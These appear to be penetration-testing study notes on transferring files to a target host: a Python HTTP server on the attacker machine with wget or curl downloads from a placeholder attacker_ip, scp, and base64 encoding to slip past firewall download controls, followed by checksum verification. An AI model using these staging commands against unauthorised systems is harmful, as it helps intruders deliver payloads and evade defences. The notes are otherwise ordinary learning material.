- Various methods for moves files to/from a target host - python HTTP server on attacker machine and `wget` or `curl` on target - `meterpreter` shell built-in `upload` command # `python` web server ```bash #setup HTTP serevr on attacker machine cd /tmp #transfer to directory with script/file to be sent to target ip a #lists attacker ma chine IP address python3 -m http.server <port> #download command A on target wget http://attacker_ip:port/script.sh #download command B on target curl http://attacker_ip:port/script.sh -o script.sh ``` # `scp` - secure copy command uses `ssh` to moves files from A top B ```bash scp /local-path-to/script.sh user@target_ip:/tmp/script.sh #default /tmp perms are typically 1777 (sticky bit!), so it's used as a staging area on attacker/target ``` # `base64` encoding - commonly used to FW protections that may disable downloading - binary-to-text encoding scheme that transfers binary data into a sequence of printable chars that is limited to a set of 64 unique chars ```bash #encode shell script on attacker, which is proved on stdout base64 shell.sh -w 0 #-w 0 option disables line wrapping #copy encoded shell script from stdout #paste encoded shell script into target terminal, then decode on target echo <base64_string> | base64 -d > shell.sh ``` # Validating File Transfers - run `file` command on transferred shell script - confirm its an `ELF` binary - run `md5sum` prior to and after transfer and compare results